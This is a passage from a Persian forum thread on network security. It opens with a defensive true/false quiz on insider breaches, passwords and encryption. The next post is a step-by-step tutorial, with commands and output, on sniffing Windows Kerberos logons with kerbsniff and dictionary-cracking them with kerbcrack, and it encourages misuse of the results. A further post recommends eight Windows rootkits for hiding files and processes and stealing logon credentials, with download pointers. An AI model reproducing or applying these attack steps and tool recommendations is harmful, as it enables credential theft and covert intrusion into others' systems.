8-نرم افزارهاي بدون كسب مجوز (Unauthorized Software ) يكي از عمومي ترين رخنه هاي امنيتي كاربران داخلي مي باشد. درست يا غلط ؟
درست – رخنه ها (Breaches ) مي تواند بدون ضرر به نظر بيايد ، مانند Screen Saver هاي دريافت شده از اينترنت يا بازي ها و ... 
نتيجه اين برنامه ها ، انتقال ويروس ها ، تروجانها و ... مي باشد. اگر چه رخنه ها مي تواند خطرناكتر از اين باشد. ايجاد يا نصب يك برنامه كنترل از راه دور كه مي تواند يك در پشتي (Backdoor ) قابل سوءاستفاده اي را در شبكه ايجاد كند كه به وسيله ديواره آتش نيز محافظت نمي شود.
بر طبق تحقيقاتي كه توسط ICSA.net و Global Integrity انجام شده است بيش از 78 درصد گزارش ها مربوط به ايجاد يك رخنه در نرم افزار دريافتي از افراد يا سايتهاي ناشناخته است.

9-خسارتهاي ناشي از سايتهاي فقط اطلاعاتي كمتر از سايتهاي تجاري مي باشد. درست يا غلط ؟
درست – درست است كه خطرهاي مالي در سايتهاي فقط اطلاعاتي كمتر از سايتهاي تجاري مي باشد ولي خطر مربوط به شهرت و اعتبار، آنها را بيشتر تهديد مي كند. سازمانها نيازمند اين مي باشند كه مداوم سايت هاي اطلاع رساني را بازبيني كنند تا به تهديد هاي احتمالي شبكه هاي خود خيلي سريع پي ببرند و در مقابل آنها واكنش نشان دهند تا از خسارتهايي كه ممكن است شهرت آنها را بر باد دهد جلوگيري كنند.

10-رمزهاي عبور مي تواند جلو كساني كه دسترسي فيزيكي به شبكه را دارند ، بگيرد. درست يا غلط ؟
غلط – كلمات رمز نوعا خيلي كم مي توانند جلو كارمندان داخلي و خبره را بگيرند. بسياري از سازمانها تمامي تلاش خود را روي امور تكنيكي امنيت اطلاعات صرف مي كنند و در برخورد با مسائل اداري و كنترل دسترسي فيزيكي لازم براي ايجاد يك محافظت مناسب ، با شكست مواجه مي شوند.

11-يك نام كاربري و يك رمز عبور مي تواند شبكه ما را از ارتباط با يك شبكه غيردوستانه (Unfriendly ) محافظت كند. درست يا غلط ؟
غلط – يك ارتباط فيزيكي و يك آدرس شبكه همه آنچيزي مي باشد كه يك نفوذگر براي نفوذ در شبكه نياز دارد.با يك ارتباط مي توان تمامي ترافيك شبكه را جذب كرد (به اين كار Sniffingمي گويند ) . مهاجم قادر است با استفاده از تكنيكهاي Sniffing كل ترافيك حساس شبكه ، شامل تركيباتي از نام كاربري/رمز عبور را جذب كند و در حملات بعدي از آنها استفاده كند.

12-هيچكسي در سازمان نبايد به رمزهاي عبور دسترسي داشته باشد به جز مدير امنيت شبكه . درست يا غلط ؟
غلط – هيچ كس در سازمان نبايد به كلمات رمز كاربران دسترسي داشته باشد ، حتي مدير امنيتي شبكه! رمزهاي عبور بايد به صورت رمز شده (Encrypted ) ذخيره شوند. براي كاربران جديد ابتدا با يك رمز عبور ساخته شده اجازه ورود به شبكه داده مي شود و پس از آن بايد روالي قرار داد تا كاربران بتوانند در هر زماني كلمات رمز خود را تغيير دهند. همچنين بايد سياستهايي را براي مواردي كه كاربران رمزهاي عبور خود را فراموش كرده اند در نظر گرفت.

13- رمزگذاري بايد براي ترافيك هاي داخلي شبكه به خوبي ترافيك خروجي شبكه انجام گيرد. درست يا غلط ؟
درست – به عنوان يك نكته بايد گفت كه فرآيند Sniffing (جذب داده هايي كه روي شبكه رد و بدل مي شود) به عنوان يك خطر امنيتي داخلي و خارجي مطرح مي شود.

14-امنيت داده ها در طول انتقال آنها هدف رمزگذاري است . درست يا غلط ؟
غلط – رمزگذاري همچنين مي تواند جامعيت (Integrity ) ، تصديق (Authentication ) و عدم انكار (nonrepudiation ) داده ها را نيز پشتيباني كند.

** دارالولایه **

درباره امضاء

شنبه 28 مرداد 1391  2:06 AM
تشکرات از این پست
amindadaadad
amindadaadad
کاربر طلایی3
تاریخ عضویت : دی 1389 
تعداد پست ها : 3567
محل سکونت : سیستان و بلوچستان

پاسخ به:آموزش های تخصصی شبکه و امنیت و ضد امنیت

++ استراق سمع در هنگام تعیین هویت ویندوز !! 

شرح کار :

کار بسیار ساده است اول میروید به Ntsecurity.nu و دو ابزار kerbcrack و kerbsniff را دریافت می نمایید . ابزار kerbsniff شبکه را تحت نظر می گیرد و به دنبال اطلاعات تعیین هویت حوزه Kerberos و ، ویندوز میگردد و نتایج را در فایلی که شما برایش مشخص میکنید ذخیره میکند !! بعد با استفاده از ابزار ورود به زور و با استفاده از یک فرهنگ لغت ابزار kerbcrack را راه اندازی میکنیم تا به هدف خود که همان کلمات عبور باشد دست پیدا کنیم .

+ مراحل استفاده از ابزار kerbsniff به شرح زیر است :



  • خود ابزار را راه اندازی میکنیم ، ابزار شبکه های فعال را تشخیص میدهد و آنها را به ما نمایش میدهد . شما باید یکی از آن ها را انتخاب کنید که من شماره 1 انتخاب کردم !!


D:\> KerbSniff.exe zxo003.txt
KerbSniff 1.3d3 - (c) 2002-2005, Arne Vidstrom
http://ntsecurity.nu/toolbox/kerbcrack/

Available network adapters:

0- 192.168.234.34
1- 192.168.234.33
2- 192.168.208.1
4- 192.168.223.1

Select the network adapter to sniff on: 1 




  • حال بر نامه فعال شده و همینجور نیز فعال می ماند ، بعد از مدتی شما بهتر است که ترکیب دو کلید Ctrl+C را استفاده کنید تا برنامه ناکام بماند و شما بتوانید از نتایج بدست آماده حداکثر سوء استفاده را بکنید ، البته اگر چیزی به دست بی آورد !! حالا ما دیگه کاری با این ابزار نداریم


++ مراحل استفاده از ابزار kerbcrack به شرح زیر است :



  • این ابزار مثل بقیه ابزار های از این دست است و بر پایه متد ورود به زور کار میکند ، شیوه استفاده به این صورت زیر است .


D:\> Kerbcrack.exe zxo003.txt –d dicitionary.txt
KerbCrack 1.3d3 - (c) 2002-2005, Arne Vidstrom
http://ntsecurity.nu/toolbox/kerbcrack/

Loaded capture file.

Currently working on :

Account name -administrator
From domain -VEGAS2
Trying password -admin
Trying password -guest
Trying password -root



  • قابل ذکر است که آخرین کلمه که نمایش میدهد و دیگر تلاش نمی کند آن کلمه ، همان کلمه عبور است .


  • این برنامه یک سری ریزه کاری های دارد خود شما باید آن یاد بگیرید !!



+ موفق باشید

** دارالولایه **

درباره امضاء

شنبه 28 مرداد 1391  2:07 AM
تشکرات از این پست
amindadaadad
amindadaadad
کاربر طلایی3
تاریخ عضویت : دی 1389 
تعداد پست ها : 3567
محل سکونت : سیستان و بلوچستان

پاسخ به:آموزش های تخصصی شبکه و امنیت و ضد امنیت

معرفی 8 Root Kit برای ویندوز 
با سلام ؛



آقا یک چند وقتی دوباره ما نبودیم دیدم بازم این بازدید کننده ها شروع کردن به گیر سه پیچ دادن به ما اعضای گرامی !!! ولی اشکال نداره یا ما با این حرفا از میدان به در میریم ( زهی خیال خام ) یا شما ها را از رو میبریم به هر حال ما که رو دست سر گردن پای عیوب (که درود خدا بر او باد) بلند شدیم با این صبر ، ولی ... اما ....



++ خوب در این پست من تصمیم دارم چند Root Kit برای سیستم عامل بیلی (ویندوز) بدون در نظر گرفتن کارای آنها برای شما معرفی کنم و البته نگاهی اجمالی به گوشه ای از قابلیت های آنها بی اندازیم !! البته منظورم از اینکه کارای آنها را در نظر نگرفتم این است که ممکن است بعضی از آنها یک Root Kit سنتی و یا اصلا یک واقعه نگار محض و.... باشد . فقط مهم این است که بر مبنای هسته هستند !!





  • AFX Root kit 2005 : یکی از جدیدترین و بهترین نوع این کدهای مرگبار است !! این کد هسته بر مبنای زبان بسیار قدرتمند Delphi نوشته شده است ، کد های منبع آن آزاد است و به راحتی میتوانید به آنها دسترسی پیدا کنید و یک نسخه شخصی از آن ایجاد کنید یا قابلیت به آن اضافه یا از آن حذف کنید . حجم این کد برابر با 256 KB است . این کد مرگبار از گیر انداختن توابع API و code injection برای مقاصد پلید خود استفاده میکند ، از قابلیت های آن میتوان به پنهان کردن پردازش ها ، فایل ها ، پورت های باز یا بسته !! کندو ها (شاخه ها) ریجستری و .... را نام برد کارای آن درست است و من تست کردم جواب گرفتم !! یادم رفت بگم که این کد مرگبار مخرب زاییده اینها است !! برای دریافت یک نسخه از این مدل Root Kit میتوانید توی سر این بکوبید !!



  • hxdef100r : این یکی هم بدک نیست !! این Root Kit یک جعبه ابزار کامل برای کلاه سیاه ها است . این Root Kit بیشترین محبوبیت را در میان عوام کسب کرده و بیشترین استفاده برای تازه کار ها و بیشترین گسترش در شبکه را دارد !! این کد مخرب هم زاییده اینها است . اوه یادم رفت بگم که حجم این هم 237 KB است . برای دریافت یک نسخه از این مدل Root Kit میتوانید توی سر  بکوبید !!



  • klister : یک مجموعه ساده از ابزار ها که در یک جا جمع شده برای بیلی 2000 (WIN2000) است !! این ابزار منتصب به خواندن ساختار اطلاعات هسته داخلی است !! به هر حال این ابزار یکی از پایدار ترین ، نوع این ها است !! این هم زاییده Joanna است که آن هم اینجا است . این هم حجمی معادل با 112 KB دارد و برای دریافت یک نسخه از این مدل میتوانید توی سر این بکوبید !!



  • patch finder : این ابزار هم یک وسیله برای کشف و آنالیز Path ها برای سیستم عامل بیلی 2000 (WIN2000) است !! این ابزار برای کشف انواع DLL های مخرب و ویروس های وارد شده و rookits ها در آن سیستم و بهره گیری از آنها است . حجمی معادل با 103 KB دارد و باز هم زاییده Joanna است که آن هم اینجا است . برای دریافت یک نسخه از این مدل میتوانید توی سر این بکوبید !



  • rk 044 : این نخستین Root Kit درست حسابی برای سیستم عامل های بیلی NT بود ، البته بگم که در واقع باید اینگونه گفت : " این کد هسته اولین کد مخرب هسته بود که کارای درستی داشت و به صورت عمومی منتشر شد " . کلمه عمومی مهم است !!! به هر حال مدت چندین سال است که این Root Kit به روز رسانی نشده و قدیمی ولی به هر حال هنوز هم کارای اساس دارد . این کد هم حجمی معادل با 252 KB دارد . برای دریافت یک نسخه از این مدل Root Kit میتوانید توی سر این بکوبید !!



  • vanquish : این Root Kit که محصول کشور رومانی است یکی از بهترین کدهای مخرب است! که شیوه کار آن نیز بر پایه تزریق یک کتابخانه دینامیک است (DLL injection!! از قابلیت های این ابزار میتوان به پنهان کردن فایل ها ، پوشه ها ، ورودی های ریجستری و شاخه ها و کندوهای آن و دستکاری فایل های ثبت رخداد و ..... نام برد .حجم این ابزار 43 KB است . این ابزار زاییده XShadow است و برای دریافت یک نسخه از این مدل Root Kit میتوانید توی سر این بکوبید !!



  • VICE : وقتی شما این دارید در واقع یک جیب بر تمام عیار دارید !! این یک ابزار کامل دزدی است ، نوشته fuzen_op است و که آن هم اینجا است . این کد مخرب حجمی معادل با 66 KB دارد و برای دریافت یک نسخه از این مدل Root Kit میتوانید توی سر این بکوبید !



  • Win logon hijack : این کد مخرب یک DLL تزریق میکند به winlogon.exe و بعد دزدی شروع میشود !! در واقع کار اصلی آن این که هر کی وارد بشه اطلاعاتی که وارد میکنه جارو میکنه !! این ابزار هم حجمی معادل با 109 KB دارد و زاییده JeFFOsZ است و که آن هم اینجا است و برای دریافت یک نسخه از این مدل Root Kitمیتوانید توی سر این بکوبید !

موفق باشید

** دارالولایه **

درباره امضاء

شنبه 28 مرداد 1391  2:08 AM
تشکرات از این پست
دسترسی سریع به انجمن ها